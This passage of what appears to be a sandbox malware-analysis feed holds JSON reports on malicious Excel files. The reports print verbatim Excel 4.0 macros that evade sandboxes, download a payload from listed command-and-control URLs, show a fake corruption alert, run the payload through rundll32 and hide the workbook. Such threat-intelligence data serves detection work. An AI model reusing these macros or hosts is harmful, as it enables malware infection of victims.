4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8725d5b43f40d20936af915385fc1b71adc3ccb8d85e1bda54a08500f69e2dbe"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"8725d5b43f40d20936af915385fc1b71adc3ccb8d85e1bda54a08500f69e2dbe","filesize":225280,"md5":"c5b5a39de434fb6b0e410c7892dc17fc","sha1":"87c4f9d991c5244574ea659e24bf38cc6d00f96c","sha256":"8725d5b43f40d20936af915385fc1b71adc3ccb8d85e1bda54a08500f69e2dbe","sha512":"22cbd03a996c938bdb3ac85aff942c0efbc7d00866bc59b065040dc59edc0ce3b5722c4d2f1799dc903e00e4121c503bbebc5f33a37758cb783e0ed81f13f8d7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8725d5b43f40d20936af915385fc1b71adc3ccb8d85e1bda54a08500f69e2dbe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0UVthCvFq8\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"872f98d7a644f0fa563caa30c3def735629498b277d6029b02395d6b1dc31a46"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"872f98d7a644f0fa563caa30c3def735629498b277d6029b02395d6b1dc31a46","filesize":152576,"md5":"c19afafeef5b2fd34fd605358b6b1d52","sha1":"1fb4bbd69a4a8b7019ce0b27ccf7f3b6e181623d","sha256":"872f98d7a644f0fa563caa30c3def735629498b277d6029b02395d6b1dc31a46","sha512":"f0b66a11de8e8c15813a82675a1b57a50a5fb6fa9bb8be584e937d0220fa82eba454a0e7e9e0259a6c5889379cc7a7a1250ccf729e07ee563846a10ad513f2ae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"872f98d7a644f0fa563caa30c3def735629498b277d6029b02395d6b1dc31a46.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ch8K0h5Hfb\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"875af0331f59d2bcdd489bd5caa1ff3f7f79ac5db35dc9eaa9b46ba53c4dd149"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"875af0331f59d2bcdd489bd5caa1ff3f7f79ac5db35dc9eaa9b46ba53c4dd149","filesize":104448,"md5":"5cc6e8595273bb5a35bb0d3e37cdb8e7","sha1":"71332b2b599ad4161c2f2712fe4b93327d42bbf3","sha256":"875af0331f59d2bcdd489bd5caa1ff3f7f79ac5db35dc9eaa9b46ba53c4dd149","sha512":"3fe8a9ee59f5817a01731fdb4dea3949831c069bde0a9bf7578f3d0cc0f48acfff0aa4afd9b2f4a8a99b7b40c44ad4cf8a148ceb482f39b44723ad66e58502b7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"875af0331f59d2bcdd489bd5caa1ff3f7f79ac5db35dc9eaa9b46ba53c4dd149.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"efFM2viBj9\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"877333bfddffe4a0110a139b9ec0aecbae6771362dbb68dba035e69bfd3ae03d"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"877333bfddffe4a0110a139b9ec0aecbae6771362dbb68dba035e69bfd3ae03d","filesize":112128,"md5":"0a9cfd2577ec208540ea81a0ec9155cb","sha1":"6eaf73deabf972d4d1a38a5b65d35e089323f83a","sha256":"877333bfddffe4a0110a139b9ec0aecbae6771362dbb68dba035e69bfd3ae03d","sha512":"cd218474e5bc772ca0e2ed9573a840897adaabbff5132de86daaf9be6fe2275c666669b16cdd67e5c1da16aa0d27b3ca4c98fc463e4b9609b592ae26978580e2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"877333bfddffe4a0110a139b9ec0aecbae6771362dbb68dba035e69bfd3ae03d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"877779dab333c75aaf57088e25917caf041046cababa09015df3c190c1a73298"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"877779dab333c75aaf57088e25917caf041046cababa09015df3c190c1a73298","filesize":212992,"md5":"a14973c217477f8f35092a32b6a2d859","sha1":"8bf06af67e0f561769a44bbaefcbf8e3700ebf82","sha256":"877779dab333c75aaf57088e25917caf041046cababa09015df3c190c1a73298","sha512":"37f39b5c82e82a65baa0b3c6cf4285797b0361a131bb4e0fa33386fb02bcff2bba4541af4ba274476630ac8c4180718bd1d217b3fbe0a7e333b36f4ba968bf08","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"877779dab333c75aaf57088e25917caf041046cababa09015df3c190c1a73298.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fNUAop7E7p\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8777b58fb26a093af3968c590b4559c39da6ecabfffbc4861c6a320a49714d2f"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"8777b58fb26a093af3968c590b4559c39da6ecabfffbc4861c6a320a49714d2f","filesize":116224,"md5":"b87106bab48896c7689a45273f21bf83","sha1":"b340c9f9d98fae0e721c3b9c8edc24501522f8f5","sha256":"8777b58fb26a093af3968c590b4559c39da6ecabfffbc4861c6a320a49714d2f","sha512":"1415597752c987e3fc23b10d9470ece5fe7dceda6b58b3ab57b0fcebb1ef7e9c0bd1b5a0c5d4959a367a89af6591280172f58127f758128378670eb61e5070b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8777b58fb26a093af3968c590b4559c39da6ecabfffbc4861c6a320a49714d2f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7MFh4O4LGF\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"87815cedd3155f75f56f0dda7200a712c9c102f251d09cf2009167b6fb3b7f4f"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"87815cedd3155f75f56f0dda7200a712c9c102f251d09cf2009167b6fb3b7f4f","filesize":160768,"md5":"d3cf1e51fa6fd25df6891451f6ca4722","sha1":"5b52760ef575e1fa056a3ff98bc6f44425ac717f","sha256":"87815cedd3155f75f56f0dda7200a712c9c102f251d09cf2009167b6fb3b7f4f","sha512":"0d817ef4ef81cb7160d08afa96e642f31c6106a4d5e96a589dd45f93c809fd11fc9f6da8d0400dae8885b4bd825f8ebf734d44fda27acd5df23aa3bcfb670fe3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"87815cedd3155f75f56f0dda7200a712c9c102f251d09cf2009167b6fb3b7f4f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bwIO7IEBCO\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8799b2ee8d2123b065eaecc1721420a5596ab662275cdc6c82dd2df6a9452eb2"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"8799b2ee8d2123b065eaecc1721420a5596ab662275cdc6c82dd2df6a9452eb2","filesize":167936,"md5":"e7b412a912c80e78fb6f35b9388e364b","sha1":"37f08b9849d97c88af6c9765a7bc3119b47dc6b6","sha256":"8799b2ee8d2123b065eaecc1721420a5596ab662275cdc6c82dd2df6a9452eb2","sha512":"c2ce96b2d43c7f9ce9dd6d1792344a7af34acfb90340b324ba538bc0fac094b5ec5a6e15bf4326f3e3ad712b7c314d4a95ef89b7bb446d1698496cca55006179","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8799b2ee8d2123b065eaecc1721420a5596ab662275cdc6c82dd2df6a9452eb2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1jIeOqAtUE\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"87a2e468d0daedc2e387859b970a0d0fba6cb71ac62b8b5f5c95fa5fb84b5acc"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"87a2e468d0daedc2e387859b970a0d0fba6cb71ac62b8b5f5c95fa5fb84b5acc","filesize":145920,"md5":"479f9faa868e21d20b75e15c944bf437","sha1":"c9cab829ea8573ec3a661e5a0acae278b6527463","sha256":"87a2e468d0daedc2e387859b970a0d0fba6cb71ac62b8b5f5c95fa5fb84b5acc","sha512":"abcad7a60b4393acedaf1e615ac8bcac3d8e340ce55fea228e3ccf5297869cc69787efc187f4d65b24ce9f0023f40d80bee219dfc2d8147d43f5d421589da684","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"87a2e468d0daedc2e387859b970a0d0fba6cb71ac62b8b5f5c95fa5fb84b5acc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"dUxzVicmc5\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"87cfb337dec80f908af94668f114ba52a72a4426897b1a8639c4f649cd8f05e4"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"87cfb337dec80f908af94668f114ba52a72a4426897b1a8639c4f649cd8f05e4","filesize":185344,"md5":"e5e249137e7c2faa50f43b466f6dbea0","sha1":"5bfde4d8e1546359a65eb703d318e0a0c0f30358","sha256":"87cfb337dec80f908af94668f114ba52a72a4426897b1a8639c4f649cd8f05e4","sha512":"84990fda15f107b808acf71ca1701f199c8dd5e034abfb6c0e3738806e22c03a812cd17ff5a1115910110d81117acb7419b84f2c3e0dda09f23348ca99b02a21","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"87cfb337dec80f908af94668f114ba52a72a4426897b1a8639c4f649cd8f05e4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"87dc2fa48f2f5eabe9564e1402accf896bff97237eb34b7fc56f86d0a26e96cb"},"analysis":{"reported":"2020-04-09T16:17:28Z","score":10},"files":[{"filename":"87dc2fa48f2f5eabe9564e1402accf896bff97237eb34b7fc56f86d0a26e96cb","filesize":207360,"md5":"6eadd4d90eef12b4c9e92613f807b07f","sha1":"90db7c92a1b43499409dd2a2d77c7a935d54a0f3","sha256":"87dc2fa48f2f5eabe9564e1402accf896bff97237eb34b7fc56f86d0a26e96cb","sha512":"9ef9a50e0c54f9ea7d10548b6d06ce0239f55263bca89bd962c14da66a12ad265c588e04dc105b96214d8a7a3068697cf091b9a0c60b06db23c0f1c78831bb4b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"87dc2fa48f2f5eabe9564e1402accf896bff97237eb34b7fc56f86d0a26e96cb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"toBuBA1Smt\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"87ee91a360d5c1054194a00edf8c3cadcad0629f6013259991866e24fb754af9"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"87ee91a360d5c1054194a00edf8c3cadcad0629f6013259991866e24fb754af9","filesize":167936,"md5":"a57311eacf2d56713a16efc8a8898d99","sha1":"e9643275969bd7f9a8edfa354b641d2f451dce37","sha256":"87ee91a360d5c1054194a00edf8c3cadcad0629f6013259991866e24fb754af9","sha512":"40d99eea5d31647b77782cd2aca32bbad0b3a51d1025d56437ed62bda77a8f23fa4caddd2f14464ca72bf719ad788946a1ee0d9cc4a784d278b5ec7a0d22b1af","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"87ee91a360d5c1054194a00edf8c3cadcad0629f6013259991866e24fb754af9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZzALJxSgPS\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"87f1fec95f2a42f8f9180cbcb5dc8c0eefdcc6c5041ddcfa07919b53fe994a40"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"87f1fec95f2a42f8f9180cbcb5dc8c0eefdcc6c5041ddcfa07919b53fe994a40","filesize":141824,"md5":"74ec961b2cce1789887d68de6c0cce85","sha1":"70d3879a1195746c072701b38f3f973edae44c52","sha256":"87f1fec95f2a42f8f9180cbcb5dc8c0eefdcc6c5041ddcfa07919b53fe994a40","sha512":"67f5d4b0b2b461342a2c42b9a378b51813ba3a1d485ab41fa86fc569c59034dc8772a7b895db6358b28f6ca142ab31782d103dd1ede6b5fa85ea207294f078a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"87f1fec95f2a42f8f9180cbcb5dc8c0eefdcc6c5041ddcfa07919b53fe994a40.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"J9p0pkxs9N\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"88174c24fc6818d366db5a6fd38ae9f455be74549f815252cbad7c64c8f08dd8"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"88174c24fc6818d366db5a6fd38ae9f455be74549f815252cbad7c64c8f08dd8","filesize":185344,"md5":"a1a2b0ffdba97b3509cfe9778db81ff5","sha1":"c9ac8ecb778bea76eb155e05c076dc93005f6be0","sha256":"88174c24fc6818d366db5a6fd38ae9f455be74549f815252cbad7c64c8f08dd8","sha512":"76737f406a7835ae8bb816f66acb6a83aff10d7fb1a8dca5233f44935de1ad715d71dfb847a52c408bb196409870fb8c5839946670ed79b2818aa5a98fb18b45","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"88174c24fc6818d366db5a6fd38ae9f455be74549f815252cbad7c64c8f08dd8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"882796c3e10c6267f2256cc9410013b67f9fec23457364c27fd77326f01e7fd7"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"882796c3e10c6267f2256cc9410013b67f9fec23457364c27fd77326f01e7fd7","filesize":104448,"md5":"0cf080952160a26bd1eb1a3bc8828e3d","sha1":"dfb31880068f65b09b9d4185af5aa6ccc754d8a6","sha256":"882796c3e10c6267f2256cc9410013b67f9fec23457364c27fd77326f01e7fd7","sha512":"3528d66752182abdf9e314764a4abfc09736cb70ce7cb8500029a2c6452c2ee05705d9285e692a9f0819b0080473787a6e288be2130d7022bf60c5a353ff9423","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"882796c3e10c6267f2256cc9410013b67f9fec23457364c27fd77326f01e7fd7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"jekczko6c9\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"88302e44a49aa5339bb59fefba7cc5463c9dabffe8c9bbec66af9501c926ad28"},"analysis":{"reported":"2020-04-09T16:17:29Z","score":10},"files":[{"filename":"88302e44a49aa5339bb59fefba7cc5463c9dabffe8c9bbec66af9501c926ad28","filesize":219136,"md5":"d3e8d0deadfcfb16c795b9b4f7fe1b91","sha1":"fea8add98e53aef4a01b0404852b1ace9963ecd9","sha256":"88302e44a49aa5339bb59fefba7cc5463c9dabffe8c9bbec66af9501c926ad28","sha512":"5f7139279cceed39cc4bb035cb27a8df78ca9f4ee7e0f7f2ff7d7cfa91ed44ec21d7d183466e9e8488c3bdf5ad6d4e5ae1db9365445bffa9a3177fb859efb1e8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"88302e44a49aa5339bb59fefba7cc5463c9dabffe8c9bbec66af9501c926ad28.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM 